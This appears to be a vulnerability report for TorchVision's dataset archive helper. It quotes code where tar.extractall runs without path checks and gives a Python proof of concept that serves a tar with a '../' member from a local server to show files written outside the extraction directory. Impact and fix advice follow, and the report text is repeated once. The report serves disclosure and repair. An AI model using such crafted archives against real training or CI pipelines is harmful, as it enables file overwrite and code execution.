🐛 Describe the bug
RCA
# Excerpt quoted in this report; the ``...`` line stands for code that is not shown here.
def download_and_extract_archive(
    url: str,
    download_root: Union[str, pathlib.Path],
    extract_root: Optional[Union[str, pathlib.Path]] = None,
    filename: Optional[Union[str, pathlib.Path]] = None,
    md5: Optional[str] = None,
    remove_finished: bool = False,
) -> None:
    ...
    # The caller-supplied url, download_root, filename and md5 are forwarded
    # unchanged to download_url.
    download_url(url, download_root, filename, md5)
The source is the caller-provided url. The helper downloads the remote archive into the local dataset cache.
# Continuation of the quoted function body: build the archive path from the
# download directory and file name, then pass it straight to extract_archive.
archive = os.path.join(download_root, filename)
extract_archive(archive, extract_root, remove_finished)
The downloaded archive is propagated directly into the extraction helper.
def _extract_tar(from_path, to_path, compression):
    """Extract the tar archive at ``from_path`` into ``to_path``.

    When ``compression`` is truthy, its value minus the first character is
    used as the tarfile mode suffix (``"r:<suffix>"``); otherwise the archive
    is opened with mode ``"r"``.
    """
    with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
        # NOTE(review): no ``filter`` argument is passed and this function does
        # not inspect member names or link targets before extracting, so what
        # gets written depends entirely on the archive contents and on the
        # running Python's tarfile defaults.
        tar.extractall(to_path)
The sink is tar.extractall(to_path). There is no invariant that checks each member's resolved path remains under to_path, and symlink or hardlink members are not rejected before extraction.
PoC
import importlib.util
import io
import pathlib
import sys
import tarfile
import tempfile
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer
def load_torchvision_dataset_utils(repo_root: pathlib.Path):
    """Execute ``torchvision/datasets/utils.py`` from *repo_root* against stub packages.

    Placeholder modules named ``torch``, ``torch.utils``,
    ``torch.utils.model_zoo``, ``torchvision``, ``torchvision.datasets`` and
    ``torchvision._internally_replaced_utils`` are installed into
    ``sys.modules`` (replacing any entries already registered under those
    names) before the file is executed, presumably so the PoC can run the
    real helper file without the real packages being importable.

    Args:
        repo_root: Directory that contains the ``torchvision`` source tree.

    Returns:
        The executed module, also registered in ``sys.modules`` as
        ``torchvision.datasets.utils``.
    """

    class DummyTqdm:
        """Do-nothing context manager exposed as ``torch.utils.model_zoo.tqdm``."""

        def __init__(self, *args, **kwargs):
            pass

        def __enter__(self):
            return self

        def __exit__(self, *args):
            # Returning False means exceptions raised inside the block propagate.
            return False

        def update(self, *args, **kwargs):
            pass

    # Stub ``torch`` tree: only the attributes assigned here exist on it.
    fake_model_zoo = types.ModuleType("torch.utils.model_zoo")
    fake_model_zoo.tqdm = DummyTqdm
    fake_torch_utils = types.ModuleType("torch.utils")
    fake_torch_utils.model_zoo = fake_model_zoo
    fake_torch = types.ModuleType("torch")
    fake_torch.Tensor = object
    fake_torch.utils = fake_torch_utils

    # Stub ``torchvision`` packages; an empty ``__path__`` marks them as
    # packages while giving the import system nowhere to search on disk.
    fake_torchvision = types.ModuleType("torchvision")
    fake_torchvision.__path__ = []
    fake_datasets = types.ModuleType("torchvision.datasets")
    fake_datasets.__path__ = []
    fake_internal = types.ModuleType("torchvision._internally_replaced_utils")
    fake_internal._download_file_from_remote_location = lambda *args, **kwargs: None
    fake_internal._is_remote_location_available = lambda: False

    sys.modules.update(
        {
            "torch": fake_torch,
            "torch.utils": fake_torch_utils,
            "torch.utils.model_zoo": fake_model_zoo,
            "torchvision": fake_torchvision,
            "torchvision.datasets": fake_datasets,
            "torchvision._internally_replaced_utils": fake_internal,
        }
    )

    # Load the helper file directly from its path under the dotted name it
    # would normally have.
    source_file = repo_root / "torchvision" / "datasets" / "utils.py"
    spec = importlib.util.spec_from_file_location("torchvision.datasets.utils", source_file)
    loaded = importlib.util.module_from_spec(spec)
    # Register before executing so the module is visible under its own name
    # while its top-level code runs.
    sys.modules[spec.name] = loaded
    spec.loader.exec_module(loaded)
    return loaded
class MaliciousTarHandler(BaseHTTPRequestHandler):
    """Serve a gzip-compressed tar archive that contains a ``../`` member.

    Every GET, whatever the path, returns a freshly built archive with one
    ordinary member (``inside.txt``) and one member whose name starts with
    ``../``.
    """

    def log_message(self, *args):
        # Keep the PoC output clean: drop the per-request log lines.
        pass

    def do_HEAD(self):
        # Fixed placeholder length; no archive is built for HEAD requests.
        self.send_response(200)
        self.send_header("Content-Length", "1")
        self.end_headers()

    def do_GET(self):
        # (member name, content) pairs, written to the archive in this order.
        members = (
            ("inside.txt", b"ok\n"),
            ("../torchvision_variant_marker", b"TORCHVISION_PATH_TRAVERSAL_CONFIRMED\n"),
        )

        buffer = io.BytesIO()
        with tarfile.open(fileobj=buffer, mode="w:gz") as archive:
            for member_name, content in members:
                info = tarfile.TarInfo(member_name)
                info.size = len(content)
                archive.addfile(info, io.BytesIO(content))
        # Read the bytes only after the tar is closed so the gzip stream is complete.
        payload = buffer.getvalue()

        self.send_response(200)
        self.send_header("Content-Type", "application/gzip")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)
def main():
    """Run the PoC against the TorchVision checkout given as ``sys.argv[1]``.

    Starts a local HTTP server on an ephemeral loopback port that serves the
    crafted archive, calls ``download_and_extract_archive`` on it, and prints
    whether the regular member and the ``../`` member ended up on disk. The
    repository root defaults to the current directory when no argument is
    given.
    """
    repo_root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".").resolve()
    dataset_utils = load_torchvision_dataset_utils(repo_root)

    with tempfile.TemporaryDirectory() as temp_dir:
        sandbox = pathlib.Path(temp_dir)
        download_root = sandbox / "download"
        extract_root = sandbox / "extract"

        # Port 0 lets the OS choose a free port; it is read back for the URL.
        server = HTTPServer(("127.0.0.1", 0), MaliciousTarHandler)
        thread = threading.Thread(target=server.serve_forever, daemon=True)
        thread.start()
        try:
            url = f"http://127.0.0.1:{server.server_port}/dataset.tar.gz"
            dataset_utils.download_and_extract_archive(
                url,
                str(download_root),
                str(extract_root),
                filename="dataset.tar.gz",
            )
        finally:
            server.shutdown()
            thread.join(timeout=2)
            # shutdown() only stops the serve_forever loop; server_close()
            # is what releases the listening socket.
            server.server_close()

        # "../torchvision_variant_marker" relative to <temp>/extract resolves
        # to the temp directory itself, one level above the extraction root.
        marker = sandbox / "torchvision_variant_marker"
        print(f"inside_exists={(extract_root / 'inside.txt').exists()}")
        print(f"traversal_marker_exists={marker.exists()}")
        if marker.exists():
            print(marker.read_text().strip())


if __name__ == "__main__":
    main()
Impact
An attacker who can control a dataset archive URL or an archive supply path consumed by TorchVision dataset utilities can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files and may lead to code execution during later import, training, or evaluation steps.
Suggested Fix
Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths, .. traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.
For Python versions that support it, use tar extraction filters such as filter="data" together with explicit destination containment checks. Zip extraction should receive the same containment validation for member names.
Versions
TorchVision 0.27 Release
🐛 Describe the bug
RCA
The source is the caller-provided `url`. The helper downloads the remote archive into the local dataset cache.
The downloaded archive is propagated directly into the extraction helper.
The sink is `tar.extractall(to_path)`. There is no invariant that checks each member's resolved path remains under `to_path`, and symlink or hardlink members are not rejected before extraction.
PoC
Impact
An attacker who can control a dataset archive URL or an archive supply path consumed by TorchVision dataset utilities can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files and may lead to code execution during later import, training, or evaluation steps.
Suggested Fix
Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths, `..` traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.
For Python versions that support it, use tar extraction filters such as `filter="data"` together with explicit destination containment checks. Zip extraction should receive the same containment validation for member names.
Versions
TorchVision 0.27 Release